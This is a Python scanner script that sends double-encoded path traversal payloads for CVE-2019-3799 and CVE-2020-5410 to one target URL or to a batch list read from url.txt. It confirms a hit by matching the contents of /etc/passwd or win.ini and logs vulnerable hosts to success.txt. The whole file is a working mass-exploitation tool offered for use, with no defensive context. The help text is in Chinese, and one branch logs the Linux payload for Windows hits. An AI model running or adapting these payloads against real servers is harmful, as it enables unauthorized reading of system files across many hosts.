import requests
import argparse
import re
CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini'
CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd'
CVE_2020_5410_linux = r'/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development'
linux_re = re.compile(r'root:[x*]:0:0:')
win_re = re.compile(r'fonts')
def write_file(name):
with open('success.txt', 'a') as f:
f.write(name+'\n')
def check_3799_linux(url, p):
try:
r = requests.get(url+p, timeout=1)
if r.status_code == 200:
r = r.text
if linux_re.search(r):
print('\033[1;31;40m[+]CVE_2019_3799: {}\033[0m'.format(url+p))
return True
except:
return False
def check_5410_linux(url, p):
try:
r = requests.get(url+p, timeout=1)
if r.status_code == 200:
r = r.text
if linux_re.search(r):
print('\033[1;31;40m[+]CVE_2020_5410: {}\033[0m'.format(url+p))
return True
except:
return False
def check_3799_win(url, p):
try:
r = requests.get(url+p, timeout=1)
if r.status_code == 200:
r = r.text
if win_re.search(r):
print('\033[1;31;40m[+]: {}\033[0m'.format(url+p))
return True
else:
print('[-] no :'+url)
except:
print('[-] error :'+url)
def chick_file():
f = open('url.txt', 'r')
for i in f.readlines():
i = i.strip()
if i[:4] != 'http':
i = 'http://'+i
if check_3799_linux(i, CVE_2019_3799_linux) == True:
write_file(i+CVE_2019_3799_linux)
elif check_5410_linux(i, CVE_2020_5410_linux) == True:
write_file(i+CVE_2020_5410_linux)
elif check_3799_win(i, CVE_2019_3799_win) ==True:
write_file(i+CVE_2019_3799_linux)
f.close()
def check_single(url):
i = url.strip()
if i[:4] != 'http':
i = 'http://' + i
if check_3799_linux(i, CVE_2019_3799_linux):
pass
elif check_5410_linux(i, CVE_2020_5410_linux):
pass
else:
check_3799_win(i, CVE_2019_3799_win)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='***CVE_2019_3799***CVE_2020_5410***')
group = parser.add_mutually_exclusive_group()
group.add_argument("-f", "--file", action="store_true", help='批量检测当前目录url.txt中的url。无需指定文件名')
parser.add_argument("-u", "--url", help='单个url检测格式: -u target_url')
args = parser.parse_args()
if args.file:
chick_file()
elif args.url:
check_single(args.url)